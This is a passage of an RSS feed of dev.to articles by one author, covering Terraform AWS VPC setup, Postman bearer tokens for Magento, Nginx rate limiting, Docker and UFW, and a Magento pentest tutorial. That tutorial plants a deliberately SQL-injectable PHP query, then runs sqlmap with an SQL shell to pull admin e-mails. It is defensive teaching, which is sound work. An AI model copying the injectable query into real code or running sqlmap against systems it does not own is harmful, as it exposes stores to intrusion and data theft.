    map_public_ip_on_launch = "true" # This is what makes it a public subnet
    availability_zone = "eu-west-1a"
    tags = {
        Name = "prod-subnet-public-1"
    }
}

resource "aws_subnet" "prod-subnet-private-1" {
    vpc_id = "${aws_vpc.prod-vpc.id}"
    cidr_block = "10.0.2.0/24"
    availability_zone = "eu-west-1a"
    tags = {
        Name = "prod-subnet-private-1"
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Create network.tf
&lt;/h3&gt;

&lt;p&gt;Now for the interesting part. We need to create the internet gateway, and the routes for subnets to communicate. Finally we will create the NAT Gateway.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Add internet gateway
resource "aws_internet_gateway" "prod-igw" {
    vpc_id = "${aws_vpc.prod-vpc.id}"
    tags = {
        Name = "prod-igw"
    }
}

# Public routes
resource "aws_route_table" "prod-public-crt" {
    vpc_id = "${aws_vpc.prod-vpc.id}"

    route {
        cidr_block = "0.0.0.0/0" 
        gateway_id = "${aws_internet_gateway.prod-igw.id}" 
    }

    tags = {
        Name = "prod-public-crt"
    }
}
resource "aws_route_table_association" "prod-crta-public-subnet-1"{
    subnet_id = "${aws_subnet.prod-subnet-public-1.id}"
    route_table_id = "${aws_route_table.prod-public-crt.id}"
}

# Private routes
resource "aws_route_table" "prod-private-crt" {
    vpc_id = "${aws_vpc.prod-vpc.id}"

    route {
        cidr_block = "0.0.0.0/0"
        nat_gateway_id = "${aws_nat_gateway.prod-nat-gateway.id}" 
    }

    tags = {
        Name = "prod-private-crt"
    }
}
resource "aws_route_table_association" "prod-crta-private-subnet-1"{
    subnet_id = "${aws_subnet.prod-subnet-private-1.id}"
    route_table_id = "${aws_route_table.prod-private-crt.id}"
}

# NAT Gateway to allow private subnet to connect out the way
resource "aws_eip" "nat_gateway" {
    vpc = true
}
resource "aws_nat_gateway" "prod-nat-gateway" {
    allocation_id = aws_eip.nat_gateway.id
    subnet_id     = "${aws_subnet.prod-subnet-public-1.id}"

    tags = {
    Name = "VPC Demo - NAT"
    }

    # To ensure proper ordering, add Internet Gateway as dependency
    depends_on = [aws_internet_gateway.prod-igw]
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Create security group
&lt;/h3&gt;

&lt;p&gt;Then add security group. Please note this is very open, you should limit SSH access to your IP address.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Security Group
resource "aws_security_group" "ssh-allowed" {
    vpc_id = "${aws_vpc.prod-vpc.id}"

    egress {
        from_port = 0
        to_port = 0
        protocol = -1
        cidr_blocks = ["0.0.0.0/0"]
    }
    ingress {
        from_port = 22
        to_port = 22
        protocol = "tcp"
        // Do not use this in production, should be limited to your own IP
        cidr_blocks = ["0.0.0.0/0"]
    }
    ingress {
        from_port = 80
        to_port = 80
        protocol = "tcp"
        cidr_blocks = ["0.0.0.0/0"]
    }
    tags = {
        Name = "ssh-allowed"
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Create ec2.tf
&lt;/h3&gt;

&lt;p&gt;Now to create our sample web app. We will use an ubuntu 20.04 AMI for demo purposes.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;resource "aws_instance" "web1" {
    ami = "${lookup(var.AMI, var.AWS_REGION)}"
    instance_type = "t2.micro"

    subnet_id = "${aws_subnet.prod-subnet-public-1.id}"
    vpc_security_group_ids = ["${aws_security_group.ssh-allowed.id}"]
    key_name = "${aws_key_pair.ireland-region-key-pair.id}"

    tags = {
        Name: "My VPC Demo 2"
    }
}
// Sends your public key to the instance
resource "aws_key_pair" "ireland-region-key-pair" {
    key_name = "ireland-region-key-pair"
    public_key = "${file(var.PUBLIC_KEY_PATH)}"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Create database.tf
&lt;/h3&gt;

&lt;p&gt;We will also use a ubuntu 20.04 AMI to create a demo instance that will become our private database:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# This is just a mock example of a database to test out VPCs
resource "aws_instance" "db1" {
    ami = "${lookup(var.AMI, var.AWS_REGION)}"
    instance_type = "t2.micro"

    subnet_id = "${aws_subnet.prod-subnet-private-1.id}"
    vpc_security_group_ids = ["${aws_security_group.ssh-allowed.id}"]
    key_name = "${aws_key_pair.ireland-region-key-pair.id}"

    tags = {
        Name: "My VPC Demo DB"
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;Now that we have our terraform infrastructure, we can initialise it by running:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;terraform init
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Next, we can review and launch it by running:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;terraform plan
terraform apply
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Important&lt;/strong&gt;: the above commands will cause AWS to start billing you.&lt;/p&gt;

&lt;p&gt;Then, once we're done testing. We can run:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;terraform destroy
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;By utilising terraform we now have better boilerplate to let us get started quicker in future. This will heavily reduce the chances of private servers being exposed to the world.&lt;/p&gt;

</description>
      <category>terraform</category>
      <category>aws</category>
      <category>security</category>
    </item>
    <item>
      <title>Using Postman with dynamic bearer tokens the right way</title>
      <dc:creator>Rhuaridh</dc:creator>
      <pubDate>Sun, 28 Nov 2021 16:11:46 +0000</pubDate>
      <link>https://dev.to/rhuaridh/using-postman-with-dynamic-bearer-tokens-the-right-way-15ma</link>
      <guid>https://dev.to/rhuaridh/using-postman-with-dynamic-bearer-tokens-the-right-way-15ma</guid>
      <description>&lt;h2&gt;
  
  
  The challenge
&lt;/h2&gt;

&lt;p&gt;This article will focus on Magento, but it can apply to any API that uses a bearer token for authentication.&lt;/p&gt;

&lt;p&gt;Magento's API uses an expiring bearer token for authorization. This means that you will need to routinely pull down a new bearer token in order to keep using the API.&lt;/p&gt;

&lt;p&gt;This is a great security feature, but adds a layer of complexity when it comes to debugging the API locally.&lt;/p&gt;

&lt;p&gt;I will show you the best way to dynamically retrieve the bearer token inside your postman request so that you can debug your API properly and unhindered.&lt;/p&gt;

&lt;p&gt;Magento's API auth can be defined in three steps:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Use admin login details to fetch bearer token&lt;/li&gt;
&lt;li&gt;Use bearer token to access all other protected API calls&lt;/li&gt;
&lt;li&gt;Refresh bearer token as needed&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Create a Magento admin user
&lt;/h2&gt;

&lt;p&gt;So for this rest api we will be using a standard magento 2 admin account. So create an admin account and give it the required role to access the resources needed.&lt;/p&gt;

&lt;p&gt;In my case I created a demo user:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;demo
SomeUniquePasswordFrogApple12
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;And assigned the full &lt;strong&gt;Administrators&lt;/strong&gt; role for simplicity. In a real world example you should give the API account the minimum access required.&lt;/p&gt;

&lt;h2&gt;
  
  
  Create new Environment called Magento2
&lt;/h2&gt;

&lt;p&gt;Inside postman we need to create a new &lt;strong&gt;Environment&lt;/strong&gt;. This is where we will configure all of our store specific variables.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;| Variable         | Value                         |
| magento_token    |                               |
| magento_url      | https://your-store-url.com    |
| magento_username | demo                          |
| magento_password | SomeUniquePasswordFrogApple12 |
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now remember to click "&lt;strong&gt;Save&lt;/strong&gt;" so that these variables can be used.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--maIdZaRe--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jgrw1jdhlahnqualaori.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--maIdZaRe--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jgrw1jdhlahnqualaori.png" alt="Postman create environment" width="880" height="205"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Create a postman request
&lt;/h2&gt;

&lt;p&gt;Create a new Collection called Magento2, this is to organise our magento requests.&lt;/p&gt;

&lt;p&gt;Within this collection we can create our first API request called "&lt;strong&gt;List Products&lt;/strong&gt;"&lt;/p&gt;

&lt;p&gt;Create a &lt;strong&gt;GET&lt;/strong&gt; request with URL:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{{magento_url}}/rest/all/V1/products
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Note that it uses our &lt;strong&gt;magento_url&lt;/strong&gt; environment variable we configured earlier.&lt;/p&gt;

&lt;h2&gt;
  
  
  Add environment to our request
&lt;/h2&gt;

&lt;p&gt;Make sure you add the Magento2 environment to this request so it can access our newly created variables.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--rpV0VOxE--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mztn14hqwt9z3cqkhc4n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--rpV0VOxE--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mztn14hqwt9z3cqkhc4n.png" alt="Postman set environment" width="718" height="416"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Add query parameters
&lt;/h2&gt;

&lt;p&gt;Since we are using the list product API call we need to add the required &lt;strong&gt;searchCriteria&lt;/strong&gt; field.&lt;/p&gt;

&lt;p&gt;Under &lt;strong&gt;Params&lt;/strong&gt;, add:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;| Variable                    | Value |
| searchCriteria[pageSize]    | 10    |
| searchCriteria[currentPage] | 1     |
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--ERCXjXtk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4xl1q300eqi7gkzuqsfp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ERCXjXtk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4xl1q300eqi7gkzuqsfp.png" alt="Postman params" width="880" height="395"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Set up bearer token authorisation
&lt;/h2&gt;

&lt;p&gt;Under &lt;strong&gt;Authorization&lt;/strong&gt;, set type to &lt;strong&gt;Bearer Token&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Then set the token value to:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{{magento_token}}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Because the bearer token will change over time we are using our &lt;strong&gt;magento_token&lt;/strong&gt; environment variable here. We will configure this in the next section.&lt;/p&gt;

&lt;p&gt;Your setup should look like this:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--jtrNiyQt--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qk0ep8rg8gr446phhp67.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--jtrNiyQt--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qk0ep8rg8gr446phhp67.png" alt="Postman set bearer" width="880" height="402"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Configure dynamic bearer token
&lt;/h2&gt;

&lt;p&gt;Now this is where the magic happens. Before every request to the API we will fetch a fresh bearer token from Magento so that it will always work.&lt;/p&gt;

&lt;p&gt;Inside our &lt;strong&gt;List Products&lt;/strong&gt; api request, we can add a "&lt;strong&gt;Pre-request Script&lt;/strong&gt;" that will be executed before each request.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;function getQueryString (obj) {
    return Object.keys(obj).map((key) =&amp;gt; `${key}=${obj[key]}`).join('&amp;amp;');
}

const qs = {
    'username': postman.getEnvironmentVariable("magento_username"),
    'password': postman.getEnvironmentVariable("magento_password")
};

pm.sendRequest({
    url: postman.getEnvironmentVariable("magento_url") + '/rest/all/V1/integration/admin/token?' + getQueryString(qs),
    method: 'POST',
    header: {
        'content-type': 'application/json',
    },
}, function (err, res) {
    var magento_token = res.json();
    postman.setEnvironmentVariable("magento_token", magento_token);
});
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you read through the script you'll notice it uses our magento username and password env variables we configured earlier, then queries our Magento API's token endpoint and retrieves our bearer token and saves it as &lt;strong&gt;magento_token&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Your postman configuration should look like this:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--LcBKqHKT--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kpmxtq2lw1khxjohedx2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--LcBKqHKT--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kpmxtq2lw1khxjohedx2.png" alt="Postman set pre request script" width="880" height="402"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Send request
&lt;/h2&gt;

&lt;p&gt;And that's it! We can now click "&lt;strong&gt;Send&lt;/strong&gt;" and we should retrieve a json response containing the first 10 products in the store:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
    "items": [
        {
            "id": 1,
            "sku": "24-MB01",
            "name": "Joust Duffle Bag",
            "attribute_set_id": 15,
            "price": 34,
            ...
        },
        ...
    ],
    "search_criteria": {
        "filter_groups": [],
        "page_size": 10,
        "current_page": 1
    },
    "total_count": 2046
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--YPUJYaa0--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/omd6ryew6ecx7wjd8f3m.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--YPUJYaa0--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/omd6ryew6ecx7wjd8f3m.png" alt="Postman response" width="880" height="645"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Closing thoughts
&lt;/h2&gt;

&lt;p&gt;This is quick to set up, and quick to adapt to other platforms that use bearer tokens in their API.&lt;/p&gt;

&lt;p&gt;If you are like me and work across a number of Magento stores daily, then you can configure multiple environments in postman this way and switch between them seamlessly.&lt;/p&gt;

</description>
      <category>api</category>
      <category>postman</category>
      <category>magento</category>
      <category>webdev</category>
    </item>
    <item>
      <title>Magento Tips - Pentest with sqlmap</title>
      <dc:creator>Rhuaridh</dc:creator>
      <pubDate>Sat, 13 Nov 2021 17:12:05 +0000</pubDate>
      <link>https://dev.to/rhuaridh/magento-tips-pentest-with-sqlmap-1cn0</link>
      <guid>https://dev.to/rhuaridh/magento-tips-pentest-with-sqlmap-1cn0</guid>
      <description>&lt;h2&gt;
  
  
  Pentest Magento2
&lt;/h2&gt;

&lt;p&gt;Magento 2 is popular and hard to upgrade. This creates the perfect breeding ground for insecure eCommerce stores which hackers love to exploit.&lt;/p&gt;

&lt;p&gt;A common tool used by penetration testers to detect insecure sites is sqlmap.&lt;/p&gt;

&lt;p&gt;In a nutshell, sqlmap is an open source tool that automates the process of detecting and exploiting SQL injection flaws.&lt;/p&gt;

&lt;h2&gt;
  
  
  Install sqlmap
&lt;/h2&gt;

&lt;p&gt;First we need to install sqlmap locally, this assumes that you have python installed already.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;It should go without saying that you should only ever use sqlmap against your own websites.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--w9foPu2y--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y699zoj4xolbaaorlajd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--w9foPu2y--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y699zoj4xolbaaorlajd.png" alt="Installing sqlmap" width="880" height="202"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Create a sample SQL injection flaw to test
&lt;/h2&gt;

&lt;p&gt;For testing purposes, on our local site we can create a SQL injection flaw to test this against. It is important that you never deploy this code live for obvious reasons.&lt;/p&gt;

&lt;p&gt;In my case, I just added this to my test controller:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$connection = $this-&amp;gt;_resourceConnection-&amp;gt;getConnection();
$year = $_GET["year"] ?? 2021;
$rows = $connection-&amp;gt;fetchAll("SELECT count(*) as total FROM sales_order WHERE created_at = $year");
$total = $rows[0]['total'] ?? 0;
echo "Hello World. There are $total orders on this site.";
exit;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;As you can see we are bypassing the ORM, and failing to escape and validate the $year input variable. This should never be done - but yet it is not uncommon to see this in third party extensions.&lt;/p&gt;

&lt;p&gt;Here is what our vulnerable extension looks like:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--AcEVihkD--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/24f1adsd2x0hjp54qbty.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--AcEVihkD--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/24f1adsd2x0hjp54qbty.png" alt="Hello world extension" width="742" height="378"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Finding a vulnerable parameter
&lt;/h2&gt;

&lt;p&gt;Find our magento store url, I will use &lt;a href="https://magento.rhuaridh.co.uk/"&gt;https://magento.rhuaridh.co.uk/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So on our local machine, we can now run sqlmap:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;python3 sqlmap.py -u https://magento.rhuaridh.co.uk/helloworld/index/helloworld?year=2021 \
--dbms=mysql \
--sql-shell
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;This command will quickly identify that year is vulnerable. The --sql-shell will then open a shell for us to run queries in.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--axSLuGRI--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/09a13wiem0se1oc0g2b2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--axSLuGRI--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/09a13wiem0se1oc0g2b2.png" alt="Finding a vuln" width="880" height="384"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Retrieving data
&lt;/h2&gt;

&lt;p&gt;For example, to pull a list of admin e-mail addresses you can run:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;SELECT email FROM admin_user;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;And that's it! That is how easy it is. We now have a list of all the admin e-mail addresses on the magento 2 store.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--OVQ7EFzU--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/k654askfzqwpostlnwo9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--OVQ7EFzU--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/k654askfzqwpostlnwo9.png" alt="Retrieving data from sqlmap" width="880" height="308"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  How do I stop SQL injection?
&lt;/h2&gt;

&lt;p&gt;Always make sure you use the ORM, never pass a variable into a query string and always validate user supplied input. It's a simple as that!&lt;/p&gt;

&lt;p&gt;Best practice exists for a reason.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Rate Limit specific URLs using Nginx</title>
      <dc:creator>Rhuaridh</dc:creator>
      <pubDate>Tue, 09 Nov 2021 09:31:15 +0000</pubDate>
      <link>https://dev.to/rhuaridh/rate-limit-specific-urls-using-nginx-1lni</link>
      <guid>https://dev.to/rhuaridh/rate-limit-specific-urls-using-nginx-1lni</guid>
      <description>&lt;h2&gt;
  
  
  Why rate limit?
&lt;/h2&gt;

&lt;p&gt;Rate limiting is a simple way of stopping users (hopefully just the bad ones!) from accessing more of your sites resources than you would like.&lt;/p&gt;

&lt;p&gt;I will show you a simple way to rate limit specific URLs by using Nginx.&lt;/p&gt;

&lt;h2&gt;
  
  
  Video Walkthrough
&lt;/h2&gt;

&lt;p&gt;The written instructions are below, but here is a quick video walkthrough showing how to apply rate limiting in Nginx.&lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/ZWjyhkvBfFA"&gt;
&lt;/iframe&gt;
&lt;/p&gt;

&lt;h2&gt;
  
  
  How to add rate limiting in nginx
&lt;/h2&gt;

&lt;p&gt;At the top of you nginx file, you can define a map like so:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;limit_req_zone $binary_remote_addr_map zone=mylimit:10m rate=5r/s;
limit_req_status 429;

map $request_uri $binary_remote_addr_map {
    default "";
    ~^/what-is-new.html $binary_remote_addr;
    ~^/another-url-to-rate-limit.html $binary_remote_addr;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Then within your location block, add:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;limit_req zone=mylimit;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;And that's it! Now only webpages matching the $request_uri will have rate limiting applied. This is handy when you have all of your request being routed through a single place, but you only want to have specific pages on your site rate limited.&lt;/p&gt;

</description>
      <category>nginx</category>
      <category>webdev</category>
      <category>devops</category>
      <category>security</category>
    </item>
    <item>
      <title>Docker Tips - UFW</title>
      <dc:creator>Rhuaridh</dc:creator>
      <pubDate>Sun, 07 Nov 2021 09:22:30 +0000</pubDate>
      <link>https://dev.to/rhuaridh/docker-tips-ufw-3k8o</link>
      <guid>https://dev.to/rhuaridh/docker-tips-ufw-3k8o</guid>
      <description>&lt;h1&gt;
  
  
  Docker Tips - UFW
&lt;/h1&gt;

&lt;p&gt;By default docker will override the "Uncomplicated Firewall" (UFW) rules, it is important to be aware of this so that you do not accidentally expose your docker containers to the world.&lt;/p&gt;

&lt;p&gt;If you had UFW configured to block port 3000, then you would be forgiven for assuming our docker app would also be blocked.&lt;br&gt;
&lt;/p&gt;

&lt;p&gt;&lt;code&gt;docker run -d -p 3000:5000 training/webapp python app.py&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;p&gt;However, docker adds rules to IP tables directly. This bypasses UFW which causes our app to be exposed to the world.&lt;/p&gt;

&lt;h2&gt;
  
  
  Two simple solutions
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1) Bind port to localhost
&lt;/h3&gt;

&lt;p&gt;The problem is that our port mapping tag exposes our app:&lt;br&gt;
&lt;/p&gt;

&lt;p&gt;&lt;code&gt;-p 3000:5000&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;p&gt;Restricting access to localhost is a simple change:&lt;br&gt;
&lt;/p&gt;

&lt;p&gt;&lt;code&gt;-p 127.0.0.1:3000:5000&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;p&gt;This binds port 5000 inside the container to port 3000 on the localhost or 127.0.0.1 interface on the host machine.&lt;/p&gt;

&lt;p&gt;Our app is now blocked from external traffic!&lt;/p&gt;

&lt;h3&gt;
  
  
  2) Use external firewalls
&lt;/h3&gt;

&lt;p&gt;GCP, AWS and even OVH all have external firewalls that sit infront of the server. Leveraging cloud based firewalls in addition to UFW is the best way to solve the issue.&lt;/p&gt;

</description>
      <category>docker</category>
      <category>ufw</category>
      <category>security</category>
      <category>firewall</category>
    </item>
  </channel>
</rss>
